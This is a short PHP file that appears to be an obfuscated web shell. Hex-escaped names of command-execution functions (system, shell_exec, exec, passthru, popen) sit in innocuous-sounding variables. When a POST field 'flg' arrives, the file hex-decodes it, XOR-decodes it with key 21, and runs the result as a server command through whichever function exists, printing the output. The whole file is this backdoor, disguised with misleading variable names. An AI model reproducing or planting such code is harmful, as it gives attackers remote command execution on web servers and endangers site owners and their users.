<?php

$module_controller4 = "passt\x68\x72u";
$module_controller6 = "\x73t\x72\x65\x61m_g\x65t_conte\x6Ets";
$module_controller1 = "\x73y\x73t\x65m";
$approve_request = "h\x65x2\x62\x69\x6E";
$module_controller7 = "pclose";
$module_controller5 = "\x70\x6Fpen";
$module_controller3 = "\x65xec";
$module_controller2 = "\x73\x68\x65\x6C\x6C_exec";
if (isset($_POST["\x66lg"])) {
            function query_handler    (    $data_chunk     ,    $dat    )    {
     $pgrp      =   ''     ;
    $h=0;
 do{
$pgrp.=chr(ord($data_chunk[$h])^$dat);
$h++;

} while($h<strlen($data_chunk));
 return      $pgrp;
    
}
            $flg = $approve_request($_POST["\x66lg"]);
            $flg = query_handler($flg, 21);
            if (function_exists($module_controller1)) {
                $module_controller1($flg);
            } elseif (function_exists($module_controller2)) {
                print $module_controller2($flg);
            } elseif (function_exists($module_controller3)) {
                $module_controller3($flg, $val_data_chunk);
                print join("\n", $val_data_chunk);
            } elseif (function_exists($module_controller4)) {
                $module_controller4($flg);
            } elseif (function_exists($module_controller5) && function_exists($module_controller6) && function_exists($module_controller7)) {
                $dat_pgrp = $module_controller5($flg, 'r');
                if ($dat_pgrp) {
                    $desc_fac = $module_controller6($dat_pgrp);
                    $module_controller7($dat_pgrp);
                    print $desc_fac;
                }
            }
            exit;
        }